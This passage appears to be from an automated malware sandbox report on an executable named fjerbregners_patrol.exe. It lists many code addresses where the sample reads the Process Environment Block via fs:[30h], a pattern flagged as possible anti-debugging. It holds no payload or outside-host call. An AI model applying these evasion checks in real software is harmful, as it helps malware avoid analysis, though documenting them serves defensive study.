        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1510F mov eax, dword ptr fs:[00000030h]2_2_33D1510F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1510F mov eax, dword ptr fs:[00000030h]2_2_33D1510F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1510F mov eax, dword ptr fs:[00000030h]2_2_33D1510F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1510F mov eax, dword ptr fs:[00000030h]2_2_33D1510F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1510F mov eax, dword ptr fs:[00000030h]2_2_33D1510F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1510F mov eax, dword ptr fs:[00000030h]2_2_33D1510F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1510F mov eax, dword ptr fs:[00000030h]2_2_33D1510F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1510F mov eax, dword ptr fs:[00000030h]2_2_33D1510F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1510F mov eax, dword ptr fs:[00000030h]2_2_33D1510F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1510F mov eax, dword ptr fs:[00000030h]2_2_33D1510F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1510F mov eax, dword ptr fs:[00000030h]2_2_33D1510F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1510F mov eax, dword ptr fs:[00000030h]2_2_33D1510F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1510F mov eax, dword ptr fs:[00000030h]2_2_33D1510F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAF13E mov eax, dword ptr fs:[00000030h]2_2_33DAF13E
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D27128 mov eax, dword ptr fs:[00000030h]2_2_33D27128
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D27128 mov eax, dword ptr fs:[00000030h]2_2_33D27128
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D0B0D0 mov eax, dword ptr fs:[00000030h]2_2_33D0B0D0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB0D6 mov eax, dword ptr fs:[00000030h]2_2_33CEB0D6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB0D6 mov eax, dword ptr fs:[00000030h]2_2_33CEB0D6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB0D6 mov eax, dword ptr fs:[00000030h]2_2_33CEB0D6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB0D6 mov eax, dword ptr fs:[00000030h]2_2_33CEB0D6
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2D0F0 mov eax, dword ptr fs:[00000030h]2_2_33D2D0F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2D0F0 mov ecx, dword ptr fs:[00000030h]2_2_33D2D0F0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE90F8 mov eax, dword ptr fs:[00000030h]2_2_33CE90F8
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE90F8 mov eax, dword ptr fs:[00000030h]2_2_33CE90F8
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE90F8 mov eax, dword ptr fs:[00000030h]2_2_33CE90F8
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE90F8 mov eax, dword ptr fs:[00000030h]2_2_33CE90F8
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D77090 mov eax, dword ptr fs:[00000030h]2_2_33D77090
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DC50B7 mov eax, dword ptr fs:[00000030h]2_2_33DC50B7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAB0AF mov eax, dword ptr fs:[00000030h]2_2_33DAB0AF
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D9F0A5
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D9F0A5
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D9F0A5
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D9F0A5
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D9F0A5
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D9F0A5
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D9F0A5
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DC505B mov eax, dword ptr fs:[00000030h]2_2_33DC505B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF1051 mov eax, dword ptr fs:[00000030h]2_2_33CF1051
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF1051 mov eax, dword ptr fs:[00000030h]2_2_33CF1051
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D99060 mov eax, dword ptr fs:[00000030h]2_2_33D99060
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF7072 mov eax, dword ptr fs:[00000030h]2_2_33CF7072
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D15004 mov eax, dword ptr fs:[00000030h]2_2_33D15004
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D15004 mov ecx, dword ptr fs:[00000030h]2_2_33D15004
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CED02D mov eax, dword ptr fs:[00000030h]2_2_33CED02D
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAF7CF mov eax, dword ptr fs:[00000030h]2_2_33DAF7CF
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF37E4 mov eax, dword ptr fs:[00000030h]2_2_33CF37E4
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF37E4 mov eax, dword ptr fs:[00000030h]2_2_33CF37E4
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF37E4 mov eax, dword ptr fs:[00000030h]2_2_33CF37E4
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF37E4 mov eax, dword ptr fs:[00000030h]2_2_33CF37E4
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF37E4 mov eax, dword ptr fs:[00000030h]2_2_33CF37E4
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF37E4 mov eax, dword ptr fs:[00000030h]2_2_33CF37E4
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF37E4 mov eax, dword ptr fs:[00000030h]2_2_33CF37E4
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF77F9 mov eax, dword ptr fs:[00000030h]2_2_33CF77F9
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF77F9 mov eax, dword ptr fs:[00000030h]2_2_33CF77F9
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D21796 mov eax, dword ptr fs:[00000030h]2_2_33D21796
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D21796 mov eax, dword ptr fs:[00000030h]2_2_33D21796
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DCB781 mov eax, dword ptr fs:[00000030h]2_2_33DCB781
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DCB781 mov eax, dword ptr fs:[00000030h]2_2_33DCB781
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DC17BC mov eax, dword ptr fs:[00000030h]2_2_33DC17BC
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBD7A7 mov eax, dword ptr fs:[00000030h]2_2_33DBD7A7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBD7A7 mov eax, dword ptr fs:[00000030h]2_2_33DBD7A7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DBD7A7 mov eax, dword ptr fs:[00000030h]2_2_33DBD7A7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D23740 mov eax, dword ptr fs:[00000030h]2_2_33D23740
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF75B mov eax, dword ptr fs:[00000030h]2_2_33CEF75B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF75B mov eax, dword ptr fs:[00000030h]2_2_33CEF75B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF75B mov eax, dword ptr fs:[00000030h]2_2_33CEF75B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF75B mov eax, dword ptr fs:[00000030h]2_2_33CEF75B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF75B mov eax, dword ptr fs:[00000030h]2_2_33CEF75B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF75B mov eax, dword ptr fs:[00000030h]2_2_33CEF75B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF75B mov eax, dword ptr fs:[00000030h]2_2_33CEF75B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF75B mov eax, dword ptr fs:[00000030h]2_2_33CEF75B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF75B mov eax, dword ptr fs:[00000030h]2_2_33CEF75B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2174A mov eax, dword ptr fs:[00000030h]2_2_33D2174A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7174B mov eax, dword ptr fs:[00000030h]2_2_33D7174B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7174B mov ecx, dword ptr fs:[00000030h]2_2_33D7174B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D31763 mov eax, dword ptr fs:[00000030h]2_2_33D31763
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D31763 mov eax, dword ptr fs:[00000030h]2_2_33D31763
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D31763 mov eax, dword ptr fs:[00000030h]2_2_33D31763
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D31763 mov eax, dword ptr fs:[00000030h]2_2_33D31763
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D31763 mov eax, dword ptr fs:[00000030h]2_2_33D31763
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D31763 mov eax, dword ptr fs:[00000030h]2_2_33D31763
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB705 mov eax, dword ptr fs:[00000030h]2_2_33CEB705
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB705 mov eax, dword ptr fs:[00000030h]2_2_33CEB705
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB705 mov eax, dword ptr fs:[00000030h]2_2_33CEB705
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB705 mov eax, dword ptr fs:[00000030h]2_2_33CEB705
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAF717 mov eax, dword ptr fs:[00000030h]2_2_33DAF717
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFD700 mov ecx, dword ptr fs:[00000030h]2_2_33CFD700
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB970B mov eax, dword ptr fs:[00000030h]2_2_33DB970B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DB970B mov eax, dword ptr fs:[00000030h]2_2_33DB970B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D19723 mov eax, dword ptr fs:[00000030h]2_2_33D19723
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D6D0 mov eax, dword ptr fs:[00000030h]2_2_33D1D6D0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE96E0 mov eax, dword ptr fs:[00000030h]2_2_33CE96E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE96E0 mov eax, dword ptr fs:[00000030h]2_2_33CE96E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF56E0 mov eax, dword ptr fs:[00000030h]2_2_33CF56E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF56E0 mov eax, dword ptr fs:[00000030h]2_2_33CF56E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF56E0 mov eax, dword ptr fs:[00000030h]2_2_33CF56E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D856E0 mov eax, dword ptr fs:[00000030h]2_2_33D856E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D856E0 mov eax, dword ptr fs:[00000030h]2_2_33D856E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D6D69D mov eax, dword ptr fs:[00000030h]2_2_33D6D69D
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAF68C mov eax, dword ptr fs:[00000030h]2_2_33DAF68C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CED64A mov eax, dword ptr fs:[00000030h]2_2_33CED64A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CED64A mov eax, dword ptr fs:[00000030h]2_2_33CED64A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D25654 mov eax, dword ptr fs:[00000030h]2_2_33D25654
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF3640 mov eax, dword ptr fs:[00000030h]2_2_33CF3640
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D0F640 mov eax, dword ptr fs:[00000030h]2_2_33D0F640
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D0F640 mov eax, dword ptr fs:[00000030h]2_2_33D0F640
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D0F640 mov eax, dword ptr fs:[00000030h]2_2_33D0F640
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF965A mov eax, dword ptr fs:[00000030h]2_2_33CF965A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF965A mov eax, dword ptr fs:[00000030h]2_2_33CF965A
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE7662 mov eax, dword ptr fs:[00000030h]2_2_33CE7662
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE7662 mov eax, dword ptr fs:[00000030h]2_2_33CE7662
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE7662 mov eax, dword ptr fs:[00000030h]2_2_33CE7662
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D03660 mov eax, dword ptr fs:[00000030h]2_2_33D03660
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D03660 mov eax, dword ptr fs:[00000030h]2_2_33D03660
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D03660 mov eax, dword ptr fs:[00000030h]2_2_33D03660
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D85660 mov eax, dword ptr fs:[00000030h]2_2_33D85660
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7166E mov eax, dword ptr fs:[00000030h]2_2_33D7166E
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7166E mov eax, dword ptr fs:[00000030h]2_2_33D7166E
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7166E mov eax, dword ptr fs:[00000030h]2_2_33D7166E
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D83608 mov eax, dword ptr fs:[00000030h]2_2_33D83608
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D83608 mov eax, dword ptr fs:[00000030h]2_2_33D83608
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D83608 mov eax, dword ptr fs:[00000030h]2_2_33D83608
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D83608 mov eax, dword ptr fs:[00000030h]2_2_33D83608
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D83608 mov eax, dword ptr fs:[00000030h]2_2_33D83608
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D83608 mov eax, dword ptr fs:[00000030h]2_2_33D83608
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D600 mov eax, dword ptr fs:[00000030h]2_2_33D1D600
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1D600 mov eax, dword ptr fs:[00000030h]2_2_33D1D600
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D79603 mov eax, dword ptr fs:[00000030h]2_2_33D79603
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAF607 mov eax, dword ptr fs:[00000030h]2_2_33DAF607
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2360F mov eax, dword ptr fs:[00000030h]2_2_33D2360F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF7623 mov eax, dword ptr fs:[00000030h]2_2_33CF7623
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF5622 mov eax, dword ptr fs:[00000030h]2_2_33CF5622
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF5622 mov eax, dword ptr fs:[00000030h]2_2_33CF5622
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2F63F mov eax, dword ptr fs:[00000030h]2_2_33D2F63F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2F63F mov eax, dword ptr fs:[00000030h]2_2_33D2F63F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9D62C mov ecx, dword ptr fs:[00000030h]2_2_33D9D62C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9D62C mov ecx, dword ptr fs:[00000030h]2_2_33D9D62C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9D62C mov eax, dword ptr fs:[00000030h]2_2_33D9D62C
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D7B5D3 mov eax, dword ptr fs:[00000030h]2_2_33D7B5D3
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF5C7 mov eax, dword ptr fs:[00000030h]2_2_33CEF5C7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF5C7 mov eax, dword ptr fs:[00000030h]2_2_33CEF5C7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF5C7 mov eax, dword ptr fs:[00000030h]2_2_33CEF5C7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF5C7 mov eax, dword ptr fs:[00000030h]2_2_33CEF5C7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF5C7 mov eax, dword ptr fs:[00000030h]2_2_33CEF5C7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF5C7 mov eax, dword ptr fs:[00000030h]2_2_33CEF5C7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF5C7 mov eax, dword ptr fs:[00000030h]2_2_33CEF5C7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF5C7 mov eax, dword ptr fs:[00000030h]2_2_33CEF5C7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEF5C7 mov eax, dword ptr fs:[00000030h]2_2_33CEF5C7
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB5E0 mov eax, dword ptr fs:[00000030h]2_2_33CFB5E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB5E0 mov eax, dword ptr fs:[00000030h]2_2_33CFB5E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB5E0 mov eax, dword ptr fs:[00000030h]2_2_33CFB5E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB5E0 mov eax, dword ptr fs:[00000030h]2_2_33CFB5E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB5E0 mov eax, dword ptr fs:[00000030h]2_2_33CFB5E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CFB5E0 mov eax, dword ptr fs:[00000030h]2_2_33CFB5E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D755E0 mov eax, dword ptr fs:[00000030h]2_2_33D755E0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D215EF mov eax, dword ptr fs:[00000030h]2_2_33D215EF
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D97591 mov edi, dword ptr fs:[00000030h]2_2_33D97591
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D29580 mov eax, dword ptr fs:[00000030h]2_2_33D29580
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D29580 mov eax, dword ptr fs:[00000030h]2_2_33D29580
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DAF582 mov eax, dword ptr fs:[00000030h]2_2_33DAF582
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DCB55F mov eax, dword ptr fs:[00000030h]2_2_33DCB55F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33DCB55F mov eax, dword ptr fs:[00000030h]2_2_33DCB55F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D79567 mov eax, dword ptr fs:[00000030h]2_2_33D79567
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F51B mov eax, dword ptr fs:[00000030h]2_2_33D9F51B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F51B mov eax, dword ptr fs:[00000030h]2_2_33D9F51B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F51B mov eax, dword ptr fs:[00000030h]2_2_33D9F51B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F51B mov eax, dword ptr fs:[00000030h]2_2_33D9F51B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F51B mov eax, dword ptr fs:[00000030h]2_2_33D9F51B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F51B mov eax, dword ptr fs:[00000030h]2_2_33D9F51B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F51B mov ecx, dword ptr fs:[00000030h]2_2_33D9F51B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F51B mov ecx, dword ptr fs:[00000030h]2_2_33D9F51B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F51B mov eax, dword ptr fs:[00000030h]2_2_33D9F51B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F51B mov eax, dword ptr fs:[00000030h]2_2_33D9F51B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F51B mov eax, dword ptr fs:[00000030h]2_2_33D9F51B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F51B mov eax, dword ptr fs:[00000030h]2_2_33D9F51B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D9F51B mov eax, dword ptr fs:[00000030h]2_2_33D9F51B
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D11514 mov eax, dword ptr fs:[00000030h]2_2_33D11514
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D11514 mov eax, dword ptr fs:[00000030h]2_2_33D11514
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D11514 mov eax, dword ptr fs:[00000030h]2_2_33D11514
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D11514 mov eax, dword ptr fs:[00000030h]2_2_33D11514
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D11514 mov eax, dword ptr fs:[00000030h]2_2_33D11514
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D11514 mov eax, dword ptr fs:[00000030h]2_2_33D11514
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CEB502 mov eax, dword ptr fs:[00000030h]2_2_33CEB502
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE753F mov eax, dword ptr fs:[00000030h]2_2_33CE753F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE753F mov eax, dword ptr fs:[00000030h]2_2_33CE753F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CE753F mov eax, dword ptr fs:[00000030h]2_2_33CE753F
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D2F523 mov eax, dword ptr fs:[00000030h]2_2_33D2F523
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D21527 mov eax, dword ptr fs:[00000030h]2_2_33D21527
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF3536 mov eax, dword ptr fs:[00000030h]2_2_33CF3536
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33CF3536 mov eax, dword ptr fs:[00000030h]2_2_33CF3536
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1F4D0 mov eax, dword ptr fs:[00000030h]2_2_33D1F4D0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1F4D0 mov eax, dword ptr fs:[00000030h]2_2_33D1F4D0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1F4D0 mov eax, dword ptr fs:[00000030h]2_2_33D1F4D0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1F4D0 mov eax, dword ptr fs:[00000030h]2_2_33D1F4D0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1F4D0 mov eax, dword ptr fs:[00000030h]2_2_33D1F4D0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1F4D0 mov eax, dword ptr fs:[00000030h]2_2_33D1F4D0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1F4D0 mov eax, dword ptr fs:[00000030h]2_2_33D1F4D0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1F4D0 mov eax, dword ptr fs:[00000030h]2_2_33D1F4D0
        Source: C:\Users\user\Desktop\fjerbregners_patrol.exeCode function: 2_2_33D1F4D0 mov eax, dword ptr fs:[00000030h]2_2_33D1F4D0
